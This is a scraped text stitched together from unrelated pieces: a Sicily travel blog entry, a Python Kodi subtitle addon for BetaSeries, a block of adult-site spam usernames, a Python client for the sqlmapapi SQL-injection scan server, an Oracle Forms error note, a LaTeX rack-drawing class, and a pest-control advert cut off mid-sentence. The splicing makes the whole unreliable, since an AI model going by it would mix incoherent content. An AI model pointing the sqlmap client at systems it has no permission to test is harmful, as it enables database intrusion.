This is our first view of Sicily, and both the people and the scenery are fascinating. Not particularly beautiful near the airport, but as we near the town center, we begin to see the style of the architecture and get a feel for what it is like to be in Sicily. It’s Italy, but clearly it’s different. The heart of Catania is the area surrounding Piazza del Duomo. As you pass the group of local men making spirited conversation by the fountain, you begin to catch a whiff of the famous fish market, which is just off the square. We stroll through the crowded and hectic streets of the fish market and listen to the vendors shouting out loud about their wares, which include all manner of squid, octopus, eels and assorted types of fish. Sicily is famous for these markets, and they are as colorful and exciting as anything you can see in Italy. Here is a little taste of it, courtesy of marciajeans on YouTube. We stop for a quick slice of pizza and Fanta on the edge of the piazza, which proves to be one of the less memorable meals of our stay. Then we find our way back to the bus stop and take the return trip to the airport. Thankfully, our bags have arrived safely from Rome. We check out our rental car, and we are on our way. Our first look at Sicily has been most rewarding. This entry was posted in 30 Days on the Road in Italy, Italy up close, Sicily and tagged sicily catania blue express rome. Bookmark the permalink.
# -*- coding: utf-8 -*-
"""XBMC/Kodi subtitle-service addon for betaseries.com (Python 2).

Flow: the script is invoked as a plugin with an `action` parameter —
`search` queries the BetaSeries API for subtitles matching the currently
playing episode and fills the GUI list; `download` fetches the chosen
subtitle (extracting zip/rar archives if needed) and hands the file path
back to XBMC.
"""
import xbmc, xbmcaddon, xbmcgui, xbmcplugin, xbmcvfs
import os, sys, re, string, urllib, urllib2, socket, unicodedata, shutil, time, platform
import simplejson as json

__addon__ = xbmcaddon.Addon()
__addonid__ = __addon__.getAddonInfo('id')
__addonname__ = __addon__.getAddonInfo('name')
__addonversion__ = __addon__.getAddonInfo('version')
__icon__ = __addon__.getAddonInfo('icon')
__language__ = __addon__.getLocalizedString
__platform__ = platform.system() + " " + platform.release()
__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8")
__temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode("utf-8")

sys.path.append( os.path.join( __profile__, "lib") )

# BetaSeries API endpoint and credentials.
self_host = "http://api.betaseries.com"
self_apikey = "5a85a0adc953"
self_apiver = "2.4"
# Captures the release-team suffix (text after the last "-") of a filename.
self_team_pattern = re.compile(r".*-([^-]+)$")
self_notify = __addon__.getSetting('notify') == 'true'

# Known equivalent release teams: column 0 holds SD team regexes, column 1
# the matching HD teams. A subtitle synced for one is assumed in sync for
# its counterpart.
TEAMS = (
    # SD[0]               HD[1]
    ("lol|sys|dim", "dimension"),
    ("asap|xii|fqm|imm", "immerse|orenji"),
    ("excellence", "remarkable"),
    ("2hd|xor", "ctu"),
    ("tla", "bia"))

# Country-code to ISO language-code aliases.
LANGUAGES = (
    # [0]   [1]
    ("br", "pt"),
    ("gr", "el"))

def other_team(team, team_from, team_to):
    """Return the release team equivalent to *team*, looked up in TEAMS.

    *team_from*/*team_to* are the column indices (0=SD, 1=HD). Falls back
    to returning *team* unchanged when no mapping matches.
    """
    # get other team using TEAMS table
    for x in TEAMS:
        if len(re.findall(x[team_from], team)) > 0:
            return x[team_to]
    # return team if not found
    log("other team not found")
    return team

def normalize_lang(lang, lang_from, lang_to):
    """Translate a language alias via the LANGUAGES table (identity if absent)."""
    # normalize lang using LANGUAGES table
    for x in LANGUAGES:
        if len(re.findall(x[lang_from], lang)) > 0:
            return x[lang_to]
    # return lang if not found
    return lang

def normalize_string(txt):
    """Strip accents and non-ASCII characters from *txt* (returns a byte string)."""
    return unicodedata.normalize('NFKD', txt).encode('ascii', 'ignore')

def log(txt, level=xbmc.LOGDEBUG):
    """Write *txt* to the XBMC log, prefixed with the addon id."""
    message = u'%s: %s' % (__addonid__, txt)
    xbmc.log(msg=message, level=level)

def set_user_agent():
    """Build an HTTP User-Agent string identifying the player and addon.

    Queries the app version over JSON-RPC; version 14+ is branded "Kodi",
    older builds "XBMC". Falls back to plain "XBMC" when the query fails.
    """
    json_query = json.loads(xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }'))
    try:
        major = str(json_query['result']['version']['major'])
        minor = str(json_query['result']['version']['minor'])
        name = "Kodi" if int(major) >= 14 else "XBMC"
        version = "%s %s.%s" % (name, major, minor)
    except:
        log("could not get app version")
        version = "XBMC"
    return "Mozilla/5.0 (compatible; " + __platform__ + "; " + version + "; " + __addonid__ + "/" + __addonversion__ + ")"

def get_params(string=""):
    """Parse plugin invocation parameters into a dict.

    Reads sys.argv[2] (the "?a=b&c=d" query string XBMC passes to plugins)
    unless an explicit *string* is given. Returns an empty list (not dict)
    when there is nothing to parse — callers only index into it when
    parameters exist.
    """
    param=[]
    if string == "":
        paramstring=sys.argv[2]
    else:
        paramstring=string
    if len(paramstring)>=2:
        params=paramstring
        cleanedparams=params.replace('?','')
        if (params[len(params)-1]=='/'):
            params=params[0:len(params)-2]
        pairsofparams=cleanedparams.split('&')
        param={}
        for i in range(len(pairsofparams)):
            splitparams={}
            splitparams=pairsofparams[i].split('=')
            if (len(splitparams))==2:
                param[splitparams[0]]=splitparams[1]
    return param

def get_url(url, referer=self_host):
    """Fetch *url* and return the response body, or False on any error.

    Sends the addon's User-Agent plus no-cache headers; errors are logged
    and optionally surfaced as a GUI notification (per the 'notify' setting).
    """
    req_headers = {
        'User-Agent': self_user_agent,
        'Cache-Control': 'no-store, no-cache, must-revalidate',
        'Pragma': 'no-cache',
        'Referer': referer}
    request = urllib2.Request(url, headers=req_headers)
    opener = urllib2.build_opener()
    try:
        response = opener.open(request)
        contents = response.read()
        return contents
    except urllib2.HTTPError, e:
        log('HTTPError = ' + str(e.code), xbmc.LOGERROR)
        if e.code == 400:
            return False
    except urllib2.URLError, e:
        log('URLError = ' + str(e.reason), xbmc.LOGERROR)
    except Exception:
        import traceback
        log('generic exception: ' + traceback.format_exc(), xbmc.LOGERROR)
    # when error occured
    if self_notify:
        xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30008), 750, __icon__)).encode('utf-8', 'ignore'))
    return False

def download_subtitle(url, ext, subversion, referer):
    """Download a subtitle (or archive) and return the local file path.

    For zip/rar downloads, extracts the archive into the temp dir via the
    XBMC.Extract builtin, polls up to 20s for new files to appear, then
    returns the path of the extracted file whose normalized name equals
    *subversion*. For plain subtitle files, returns the downloaded temp
    file directly. Returns False when the download itself fails.
    NOTE(review): if an archive extracts but no file matches *subversion*,
    the function falls through and returns None — callers treat any falsy
    value as failure, so this is equivalent to False in practice.
    """
    # name of temp file for download
    local_tmp_file = os.path.join(__temp__, "betaseries." + ext)
    log("downloading url : %s" % (url))
    socket.setdefaulttimeout(15)
    content = get_url(url, referer)
    if content:
        local_file_handle = open(local_tmp_file, "w" + "b")
        local_file_handle.write(content)
        local_file_handle.close()
        log("file extension is : %s" % (ext))
        if ext in ['zip','rar']:
            files = os.listdir(__temp__)
            init_filecount = len(files)
            log("number of files : %s" % (init_filecount))
            filecount = init_filecount
            log("extracting zip file : %s" % (local_tmp_file))
            xbmc.executebuiltin("XBMC.Extract(" + local_tmp_file + "," + __temp__ +")")
            waittime = 0
            while (filecount == init_filecount) and (waittime < 20):
                # nothing yet extracted
                time.sleep(1)  # wait 1 second to let the builtin function 'XBMC.extract' unpack
                files = os.listdir(__temp__)
                filecount = len(files)
                waittime = waittime + 1
            # if max waittime reached
            if waittime == 20:
                log("error unpacking files in : %s" % (__temp__))
            else:
                log("unpacked files in : %s" % (__temp__))
                time.sleep(1)
                files = os.listdir(__temp__)
                log("looking for %s" % (subversion))
                for filename in files:
                    log("checking file %s" % (filename))
                    if normalize_string(filename) == subversion:
                        filepath = os.path.normpath(os.path.join(__temp__, filename))
                        log("selected file : %s" % (filename))
                        return filepath
        else:
            log("selected file : %s" % (subversion))
            return local_tmp_file
    else:
        return False

def search_subtitles(search):
    """Query BetaSeries for subtitles matching the playing episode.

    *search* is the dict built at script level: mode (tvshow/movie/file),
    path, season, episode, uilang and allowed langs. Resolves the episode
    either via the library's TheTVDB id (tvshow mode) or by filename
    scraping, filters/scores the returned subtitle files (language, sync
    with the release team, hearing-impaired tag, quality note), sorts them
    and populates the XBMC directory listing. Returns False on any failure
    path; movies are not supported.
    """
    subtitles = []
    log("entering search_subtitles()")
    if search['mode'] == "movie":
        log("movies not supported!")
        return False
    # get video file name
    dirsync = __addon__.getSetting('dirsync') == 'true'
    if dirsync:
        # get directory name as filename
        filename = os.path.basename(os.path.dirname(search['path'])).lower()
    else:
        # or use filename
        filename = os.path.basename(search['path']).lower()
        # and remove file extension
        filename = re.sub(r"\.[^.]+$", "", filename)
    filename = normalize_string(filename)
    log("after filename = %s" % (filename))
    # if file, check if valid tvshow
    if search['mode'] == "file" and not re.search(r"(?i)(s[0-9]+e[0-9]+|[0-9]+x?[0-9]{2,})", filename):
        log("not a tvshow or badly named!")
        return False
    # get subtitle team
    subteams = []
    subteams.append(filename.replace(".","-"))
    if len(subteams[0]) > 0:
        # get team name (everything after "-")
        subteams[0] = self_team_pattern.match("-" + subteams[0]).groups()[0].lower()
        # find equivalent teams, if any
        tmp = other_team(subteams[0],0,1)
        if len(tmp) > 0 and tmp != subteams[0]:
            subteams.append(tmp)
        # find other equivalent teams, if any
        tmp = other_team(subteams[0],1,0)
        if len(tmp) > 0 and tmp != subteams[0]:
            subteams.append(tmp)
    log("after subteams = %s" % (subteams))
    # configure socket
    socket.setdefaulttimeout(10)
    # define default url to get betaseries episode id from filename
    episodeurl = "%s/episodes/scraper?file=%s&key=%s&v=%s" % (self_host, urllib.quote(filename), self_apikey, self_apiver)
    # check video type
    if search['mode'] == "tvshow":
        # get playerid
        json_query = '{"jsonrpc": "2.0", "method": "Player.GetActivePlayers", "id": 1}'
        playerid = json.loads(xbmc.executeJSONRPC(json_query))['result'][0]['playerid']
        # get tvshowid
        json_query = '{"jsonrpc": "2.0", "method": "Player.GetItem", "params": {"playerid": ' + str(playerid) + ', "properties": ["tvshowid"]}, "id": 1}'
        tvshowid = json.loads(xbmc.executeJSONRPC (json_query))['result']['item']['tvshowid']
        # check result
        if tvshowid > 0:
            # get tvdbid
            json_query = '{"jsonrpc": "2.0", "method": "VideoLibrary.GetTVShowDetails", "params": {"tvshowid": ' + str(tvshowid) + ', "properties": ["imdbnumber"]}, "id": 1}'
            tvdbid_result = json.loads(xbmc.executeJSONRPC(json_query))
            # if we have tvdbid, work with ids
            if 'result' in tvdbid_result:
                # get betaseries show id from tvdbid
                tvdbid = tvdbid_result['result']['tvshowdetails']['imdbnumber']
                showurl = "%s/shows/display?thetvdb_id=%s&key=%s&v=%s" % (self_host, tvdbid, self_apikey, self_apiver)
                try:
                    showid = json.loads(get_url(showurl))["show"]["id"]
                except:
                    log("could not parse data or fetch url for showid, cannot continue")
                    return False
                log("after showid = %s" % (showid))
                # then get betaseries episode id
                episodeurl = "%s/episodes/search?show_id=%s&number=S%%#02dE%%#02d&key=%s&v=%s" % (self_host, showid, int(search['season']), int(search['episode']), self_apikey, self_apiver) if False else "%s/episodes/search?show_id=%s&number=S%#02dE%#02d&key=%s&v=%s" % (self_host, showid, int(search['season']), int(search['episode']), self_apikey, self_apiver)
    try:
        episodeid = json.loads(get_url(episodeurl))["episode"]["id"]
        log("after episodeid = %s" % (episodeid))
    except:
        log("error or episode not found!")
        return False
    # then get subtitles list
    listurl = "%s/subtitles/episode?id=%s&key=%s&v=%s" % (self_host, episodeid, self_apikey, self_apiver)
    try:
        data = json.loads(get_url(listurl))["subtitles"]
    except:
        log("could not parse data or fetch url, cannot continue")
        return False
    # for each release version
    log("parsing data after urlopen")
    log("--------------------------")
    for subtitle in data:
        # get filename
        subfile = normalize_string(subtitle["file"])
        log("after subfile = %s" % (subfile))
        # get file extension
        ext = string.split(subfile,'.')[-1]
        # get season number from data
        season = int(subtitle["episode"]["season"])
        log("after season = %s" % (season))
        # get episode number from data
        episode = int(subtitle["episode"]["episode"])
        log("after episode = %s" % (episode))
        # get names of files contained in zip file, if any
        if len(subtitle["content"]) > 0:
            content = subtitle["content"]
        # or put filename in content
        else:
            content = [subtitle["file"]]
        log("after content = %s" % (content))
        # for each file in content
        for subversion in content:
            log("-------------")
            # subtitle file name
            subversion = normalize_string(subversion)
            log("after subversion = %s" % (subversion))
            # subtitle download url
            link = subtitle["url"]
            log("after link = %s" % (link))
            try:
                # normalize lang (VOVF = dual-language, mapped to "xx")
                lang2 = {
                    "VO": "en",
                    "VF": "fr",
                    "VOVF": "xx",
                }[subtitle["language"]]
            except:
                log("unsupported language")
                continue
            # get note (quality rating clamped to 0..5)
            if 0 <= int(subtitle["quality"]) <= 5:
                note = int(subtitle["quality"])
            else:
                note = 0
            log("after note = %s" % (note))
            # check if file is a subtitle
            if not len(re.findall(r"(?i)\.(srt|ssa|ass|sub)$", subversion)):
                log("not a subtitle : %s" % (subversion))
                continue
            # if from a zip file
            if len(content) > 1:
                # check if file is for correct season and episode
                search_string = r"(?i)(s%#02de%#02d|%d%#02d|%dx%#02d)" % (season, episode, season, episode, season, episode)
                if not re.search(search_string, subversion):
                    log("file not matching episode : %s" % (subversion))
                    continue
                # get subtitle file lang
                langs = re.search(r"(?i)[ _.-](english|french|eng|fre|en|fr|vo|vf)[ _.-]", subversion)
                # or get zip file lang
                if langs == None:
                    langs = lang2
                else:
                    langs = langs.group(1).lower()
                log("after zip langs = %s" % (lang2))
                try:
                    lang2 = {
                        "french": 'fr',
                        "english": 'en',
                        "fre": 'fr',
                        "eng": 'en',
                        "fr": 'fr',
                        "en": 'en',
                        "vf": 'fr',
                        "vo": 'en'
                    }[langs]
                except:
                    log("unsupported language")
                    continue
                log("after zip lang2 = %s" % (lang2))
            try:
                # get full language name
                lang = xbmc.convertLanguage(lang2, xbmc.ENGLISH_NAME)
            except:
                log("unsupported language")
                continue
            # if lang = user gui language
            if lang == search['uilang']:
                # put this file on top
                uilang = True
            else:
                uilang = False
            log("after lang = %s, lang2 = %s" % (lang, lang2))
            # check sync
            sync = False
            team = False
            for (key, subteam) in enumerate(subteams):
                # if team corresponds
                if len(subteam) > 0 and len(re.findall(r"(?i)[ _.-](" + subteam + ")[ _.-]", subversion)) > 0:
                    # set sync tag
                    sync = True
                    # if videofile team matches subfile team
                    if key == 0:
                        team = True
            log("after sync = %s" % (sync))
            # check if this is for hearing impaired
            if len(re.findall(r"(?i)[ _.-](CC|HI)[ _.-]", subversion)) > 0:
                cc = True
            else:
                cc = False
            log("after cc = %s" % (cc))
            # if language allowed by user
            if lang2 in search['langs']:
                # add subtitle to list
                subtitles.append({'uilang':uilang,'ext':ext,'filename':subversion,'link':link,'lang':lang,'lang2':lang2,"cc":cc,"sync":sync,"note":note,"team":team})
                log("subtitle added : %s" % (subversion))
    log("--------------------------")
    if subtitles:
        # get settings for sorting
        uifirst = __addon__.getSetting('uifirst') == 'true'
        ccfirst = __addon__.getSetting('ccfirst') == 'true'
        # sort accordingly — stable sorts applied from least- to
        # most-significant criterion (team sync ends up dominating)
        log("sorting by filename asc")
        subtitles.sort(key=lambda x: [x['filename']])
        if not ccfirst:
            log("sorting by cc last")
            subtitles.sort(key=lambda x: [x['cc']])
        log("sorting by note best")
        subtitles.sort(key=lambda x: [x['note']], reverse=True)
        log("sorting by lang asc")
        subtitles.sort(key=lambda x: [x['lang']])
        if ccfirst:
            log("sorting by cc first")
            subtitles.sort(key=lambda x: [not x['cc']])
        if uifirst:
            log("sorting by uilang first")
            subtitles.sort(key=lambda x: [not x['uilang']])
        log("sorting by sync first")
        subtitles.sort(key=lambda x: [not x['sync']])
        log("sorting by team first")
        subtitles.sort(key=lambda x: [not x['team']])
        log("sorted subtitles = %s" % (subtitles))
        # for each subtitle
        for item in subtitles:
            # xbmc list item format
            listitem = xbmcgui.ListItem(label=item["lang"], label2=item["filename"], iconImage=str(item["note"]), thumbnailImage=item["lang2"])
            # setting sync / CC tag
            listitem.setProperty("sync", 'true' if item["sync"] else 'false')
            listitem.setProperty("hearing_imp", 'true' if item["cc"] else 'false')
            # adding item to GUI list
            url = "plugin://%s/?action=download&link=%s&ext=%s&filename=%s" % (__addonid__, item["link"], item["ext"], urllib.quote(item["filename"]))
            xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False)
    else:
        if self_notify:
            xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30010), 750, __icon__)).encode('utf-8', 'ignore'))
        log("nothing found")
    log("end of search_subtitles()")

# start of script
# clean up any leftovers from a previous run, then recreate the temp dir
if os.path.exists(__temp__):
    log("deleting temp tree...")
    shutil.rmtree(__temp__.encode("utf-8","ignore"))
log("recreating temp dir...")
xbmcvfs.mkdirs(__temp__)
# define user-agent
self_user_agent = set_user_agent()
# get params
params = get_params()
# called when user is searching for subtitles
if params['action'] == 'search':
    item = {}
    item['tvshow'] = xbmc.getInfoLabel("VideoPlayer.TVshowtitle").decode("utf-8")
    item['year'] = xbmc.getInfoLabel("VideoPlayer.Year")
    item['season'] = xbmc.getInfoLabel("VideoPlayer.Season")
    item['episode'] = xbmc.getInfoLabel("VideoPlayer.Episode")
    item['path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8'))
    item['uilang'] = xbmc.getLanguage()
    item['langs'] = []
    # get user preferred languages for subtitles
    for lang in urllib.unquote(params['languages']).decode('utf-8').split(","):
        item['langs'].append(xbmc.convertLanguage(lang, xbmc.ISO_639_1))
    # remove rar:// or stack://
    if ( item['path'].find("rar://") > -1 ):
        item['path'] = os.path.dirname(item['path'][6:])
    elif ( item['path'].find("stack://") > -1 ):
        stackPath = item['path'].split(" , ")
        item['path'] = stackPath[0][8:]
    # show item data in debug log
    log("after item = %s" % (item))
    # find playing mode: library tvshow, movie (has a year), or bare file
    if len(item['tvshow']) > 0:
        item['mode'] = "tvshow"
    elif item['year'] != "":
        item['mode'] = "movie"
    else:
        item['mode'] = "file"
    # search for subtitles
    search_subtitles(item)
# called when user clicks on a subtitle
elif params['action'] == 'download':
    # download link
    sub = download_subtitle(params["link"], params["ext"], urllib.unquote(params["filename"]), self_host)
    if sub:
        # xbmc handles moving and using the subtitle
        listitem = xbmcgui.ListItem(label=sub)
        xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
AmeliHottie bombasexxx jasmin. TremblingSakura. SamantaWhite. TigROCK. TicoscalientesROBSTEELXLxlightBrunetteGATICARIKASEXY01 .stefanomoralesxOnlyAnal4UxXLissajasonTarajiQueen .IamNextDoorWendyMilnmasterlogisaSEXYh0tSARAH .TylerAndTonySEXYh0tSARAHFantasticLove1LaceyBreeze .HotInsuMaiaBrunniAnalxpassionMaryLoveQT .davetest4126LauraDivineSinnerburningxOnlyAnal4UxX .OneSexxyCouplemjessejass2HugePhilCockTicoscalientes .EnigmaAnn1MaryHotBBlanalucilleTSMiaIsabella25 .2HugePhilCockNaugtyXXXCouple2HugePhilCockxOnlyAnal4UxX .JhonEiderMaggiHotsharitaxAngeloWhite .AnalxpassionXXAnnaBelleXXXMatureSandraAmandaLowe . ScarlettRougeeKoleenSamantaWhiteLissajason .FreshAsiaXXAnnaBelleXXGrannyNeeedsSinnerburning .GATICARIKASEXY01MaggiHotAnalxpassionKRISTHIANHOT .stefanomoralesLoraAngel4u666pussycatKRISTHIANHOT .xOnlyAnal4UxXJonnyStarkGrannyNeeedsSinnerburning .xOnlyAnal4UxXbabyrihKatherineJones84Lisangel1974 .WalletQueeennnXMatureSandraAnalxpassionOneSexxyCouplem .TylerAndTonyAngeloWhiteGDaNaFAngeloWhite .BettyJoonesAlisonSexyBlondlanalucilleSelenaJones .TastyVivianSEXYh0tSARAHMissLilyRoseCuteLittleMonkey .babyrihBettyJoonesLissajasonTylerWood .
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Client-side wrapper for a single sqlmapapi scan task.

Remote endpoints used (see sqlmapapi server):
-----------------------------------------------------
@post('/scan/<taskid>/start')
@get('/scan/<taskid>/stop')
@get('/scan/<taskid>/kill')
@get('/scan/<taskid>/status')
@get('/scan/<taskid>/data')
-----------------------------------------------------
"""

import time
from urllib.parse import urljoin

import requests

from .logs import get_logger
from .exceptions import TaskStatusError, TaskResultError, TaskLogError


logger = get_logger('sqlmapcli')


class TaskStatus(object):
    """ Task status constants as reported by the sqlmapapi server. """
    READY = 'not running'      # created but not started
    RUNNING = 'running'        # scan in progress
    FINISHED = 'terminated'    # scan completed (successfully or not)


class Task(object):

    def __init__(self, id, options, addr):
        """ Create a task object.

        Args:
            id (str): task id from remote sqlmapapi server.
            options (dict): options used to run task, see
                `curl http://<host>:<port>/option/<taskid>/list`.
            addr (str): remote sqlmapapi server address.
        """
        self.id = id
        self.addr = addr
        self.options = options or {}
        # always store url target in task object
        self.url = self.options.get('url', None)

    def __str__(self):
        return '<Task#%s>' % self.id

    def __repr__(self):
        return str(self)

    def _request(self, path, method='GET'):
        """ Used to request remote sqlmapapi server.

        POST requests always send the current task options as the JSON body.

        Args:
            path (str): url path for request.
            method (str): GET or POST for different request.

        Returns:
            dict if successful, None otherwise.
        """
        try:
            url, method = urljoin(self.addr, path), method.upper()
            if method == 'GET':
                r = requests.get(url).json()
            elif method == 'POST':
                r = requests.post(url, json=self.options).json()
        except requests.RequestException as e:
            logger.error('Fail to %s %s: %s' % (method, path, e))
            return None

        if r.get('success'):
            return r
        logger.error('Fail to %s %s: %s' % (method, path, r.get('message')))  # noqa
        return None

    def set_option(self, key, value):
        """ Set option for task.

        Options can be set when client create task, or call `set_option`
        after task is created but not start.

        Args:
            key (str): option name.
            value (str): option value.

        Returns:
            Task: for chained call, eg.
                `task.set_option(key, value).set_option(key, value)`.
        """
        self.options[key] = value
        if key == 'url':
            self.url = value
        return self

    def get_option(self, key):
        """ Get task option.

        Args:
            key (str): option name.

        Returns:
            str: option value.
        """
        return self.options.get(key)

    def update_options(self, options):
        """ Update several options at the same time.

        Args:
            options (dict): options that to update.
        """
        self.options.update(options)
        if 'url' in options:
            self.url = options.get('url')

    def list_options(self):
        """ Get options that were manually set.

        Returns:
            dict: options that user set.
        """
        return self.options

    def start(self, url=None, options=None):
        """ Task start to run.

        Args:
            url (str): target url to scan by sqlmap, this is a shorthand
                for set option with key `url`.
            options (Optional[dict]): shorthand, set options for task,
                alternative to `set_option` or `update_options` or set
                options when create task.

        Returns:
            str: engineid, maybe useful in future; None if the request
                failed.
        """
        if options:
            self.update_options(options)
        if url:
            # set_option already keeps self.url in sync
            self.set_option('url', url)
        r = self._request('/scan/%s/start' % self.id, 'POST')
        self.engineid = r.get('engineid') if r else None
        return self.engineid

    def stop(self):
        """ Stop running task.

        Returns:
            bool: True if stop successfully, False otherwise.
        """
        r = self._request('/scan/%s/stop' % self.id)
        return bool(r)

    def kill(self):
        """ Kill running task unconditionally.

        Returns:
            bool: True if Kill successfully, False otherwise.
        """
        r = self._request('/scan/%s/kill' % self.id)
        return bool(r)

    def status(self):
        """ Task current status: ready, running or finished.

        Returns:
            dict: include status and retcode.

        Raises:
            TaskStatusError: status exception.
        """
        r = self._request('/scan/%s/status' % self.id)
        if r:
            status, retcode = r.get('status'), r.get('returncode')
            return {'status': status, 'retcode': retcode}
        raise TaskStatusError("Can't get status")

    def _status_is(self, expected):
        """ Return True if the remote status equals *expected*.

        Any status-query failure is logged and reported as False so the
        boolean properties below never raise.
        """
        try:
            return self.status().get('status') == expected
        except TaskStatusError as e:
            logger.error('Fail to GET task<%s> status: %s', self.id, e)
            return False

    @property
    def ready(self):
        """ Shorthand for task status.

        Returns:
            bool: True if task is created but not start, False otherwise.
        """
        return self._status_is(TaskStatus.READY)

    @property
    def running(self):
        """ Shorthand for task status.

        Returns:
            bool: True if task start but not finished, False otherwise.
        """
        return self._status_is(TaskStatus.RUNNING)

    @property
    def finished(self):
        """ Shorthand for task status.

        Returns:
            bool: True if task is finished, False otherwise.
        """
        return self._status_is(TaskStatus.FINISHED)

    def get_result(self):
        """ Get task result.

        Returns:
            dict: task data.

        Raises:
            TaskResultError: task result exception.
        """
        r = self._request('/scan/%s/data' % self.id)
        if r:
            return r.get('data')
        raise TaskResultError("Can't get result")

    def get_log(self, start=None, end=None):
        """ Get task log.

        Args:
            start (int): start index of log list.
            end (int): end index of log list.

        Returns:
            dict: task log data.

        Raises:
            TaskLogError: task log exception.
        """
        # NOTE: compare against None, not truthiness -- a start/end index
        # of 0 is legitimate and must still hit the ranged endpoint.
        if start is not None and end is not None:
            r = self._request('/scan/%s/log/%s/%s' % (self.id, start, end))
        else:
            r = self._request('/scan/%s/log' % self.id)
        if r:
            return r.get('log')
        raise TaskLogError("Can't get log")

    def run(self, url=None, options=None, interval=5):
        """ Shorthand for call `start`, `status` and `get_result`.

        Args:
            url (str): target url to scan by sqlmap, this is a shorthand
                for set option with key `url`.
            options (Optional[dict]): shorthand, set options for task,
                alternative to `set_option` or `update_options` or set
                options when create task.
            interval (int): interval time to query task status, seconds
                default.

        Returns:
            dict if successfully, None otherwise.
        """
        self.start(url, options)
        while self.running:
            time.sleep(interval)
        try:
            r = self.get_result()
        except TaskResultError as e:
            logger.error('Fail to GET task<%s> result: %s', self.id, e)
            return None
        return r
Error: "FRM-92101 , found the following error in FormsGroup.0.stdout - Forms session <84> aborted: unable to communicate with runtime process." But this cannot be used as a permanent fix, because after this change all the connections coming to forms will treated as if they are coming from the IP address 100.100.100.100. So current workaround can be used as temporary fix until the issue is permenantly fixed by applying the required patch.
#!/usr/bin/python
import rack
import string  # retained: other parts of the file may still use it


class RackView:
    """ Visitor that renders a rack (or rack array) as LaTeX markup.

    Walks the rack's elements top-down, collecting images, notes and a
    checklist table, and returns the assembled LaTeX source from render().
    """

    def __init__(self, name):
        """
        @param name: output file name; its stem is used as the
            \\includegraphics target for the rack picture.
        """
        self.options = []
        self.name = name
        # output variable: accumulated LaTeX lines
        self.o = []
        self.notes = []
        self.images = []
        self.checklist = []

    def render(self, thing):
        """
        @param thing: the rack or rackarray to be drawn
        @return: the complete LaTeX source as a single string
        """
        self.o.append("\\section{%s}" % (thing._name,))
        self.o.append("\\begin{multicols}{2}")
        # str.split replaces the deprecated string.split module function
        self.o.append("\\includegraphics[height=\\textheight]{%s}" %
                      (self.name.split('.')[0],))
        self.o.append("\\columnbreak")

        # requirements
        #self.o.append("\\\\Requirements")
        #self.o.append("\\begin{itemize}")
        #for (k, v) in [("network port", thing.network),
        #               ("power outlet", thing.power),
        #               ]:
        #    self.o.append("\item %s %s%s" % (v, k, ["s", ""][v == 1]))
        #self.o.append("\\end{itemize}")

        # recurse top-down through the rack units
        for y in range(thing.units - 1, -1, -1):
            # `in` replaces the deprecated dict.has_key() (removed in Py3)
            if y in thing._elements:
                e = thing._elements[y]
                if e is not None:
                    e.visit(self)

        # notes
        #self.o.append("\\subsubsection{Notes}")
        #self.o.append("{\\small")
        #if len(self.notes) > 0:
        #    self.o.append("\\begin{description}")
        #    self.o += self.notes
        #    self.o.append("\\end{description}")
        #self.o.append("}%end small")

        # checklist
        if len(self.checklist) > 0:
            self.o.append("\\begin{center}")
            self.o.append("{\\footnotesize")
            self.o.append("\\begin{tabular}{r|c|c|c|c|c}")
            self.o.append("&racked&net&pow&on&servs\\\\")
            self.o.append("\\hline")
            self.o += self.checklist
            self.o.append("\\end{tabular}")
            self.o.append("}%end footnotesize")
            self.o.append("\\end{center}")

        # images
        self.o.append("\\begin{center}")
        self.o += self.images
        self.o.append("\\end{center}")

        self.o.append("\\end{multicols}")

        # spit out; str.join replaces the deprecated string.join function
        return "\n".join(self.o)

    def visitRackElement(self, e):
        """ Record image, note and a checklist row for a generic element. """
        if e.image != "":
            self.images.append("\\includegraphics[width=4cm]{%s}\\\\" %
                               (e.image,))
        if e.notes != "":
            self.notes.append("\\item[%s] %s" % (e.name, e.notes))
        self.checklist.append("%s&&&&&\\\\\n\\hline" % (e.name,))

    def visitCableManagement(self, cman):
        # cable management produces no output
        pass

    def visitRackmount(self, rm):
        return self.visitRackElement(rm)

    def visitSwitch(self, sw):
        return self.visitRackElement(sw)

    def visitAPC(self, apc):
        return self.visitRackElement(apc)

    def visitGap(self, gap):
        # empty rack units produce no output
        pass

    def visitShelf(self, shelf):
        """ Visit shelf contents; add a line break if any produced images. """
        l = len(self.images)
        for e in shelf._elements:
            e.visit(self)
        if len(self.images) > l:
            self.images.append("\\\\")

    def visitShelf1RU(self, shelf):
        return self.visitShelf(shelf)

    def visitShelf2U(self, shelf):
        return self.visitShelf(shelf)

    def visitShelf1a(self, shelf):
        return self.visitShelf(shelf)

    def visitBox(self, box):
        """ Record image (scaled by width), note and checklist row for a box. """
        if box.image != "":
            self.images.append("\\includegraphics[width=%smm]{%s}" %
                               (box.width / 11, box.image))
        if box.notes != "":
            self.notes.append("\\item[%s] %s" % (box._name, box.notes))
        self.checklist.append("%s&&&&&\\\\\n\\hline" % (box._name,))
Looking for the best services for pest control Bellara? Fast Pest Control is the place you need to be. We have a team of experts working in the field for more than a decade, fighting all types of pests. Whether you have a crawling pest infestation or a flying pest infestation, we can handle it all. Call now for a same-day pest inspection! Why Fast Pest Control Bellara? Welcome to Fast Pest Control Bellara – your local pest control experts. We deliver exceptional pest eradication services to protect your homes in an innovative and safe manner across all the suburbs of Bellara. We use effective and advanced pest control methods to create secure and comfortable environments for your homes and offices. Our modus operandi for removing pests ensures that your life gets freed from all kinds of unwanted pests and termites. We at Fast Pest Control do not believe in burning a hole in our customers’ pockets. Moreover, unlike other pest control firms in Bellara, we do not sacrifice the quality of our pest control methods even while serving you at reasonable prices. We use high-quality chemicals in our pest control treatments that do not cause any harm to your family and pets. Also, we revisit your place after a certain period of time to check whether the services provided have been effective. Our professionals also give free pest control advice and treatments to our clients. Call us for the free quotes today. Fast Pest Control Bellara provides affordable residential pest control services in all suburbs of Bellara. When you sell or buy 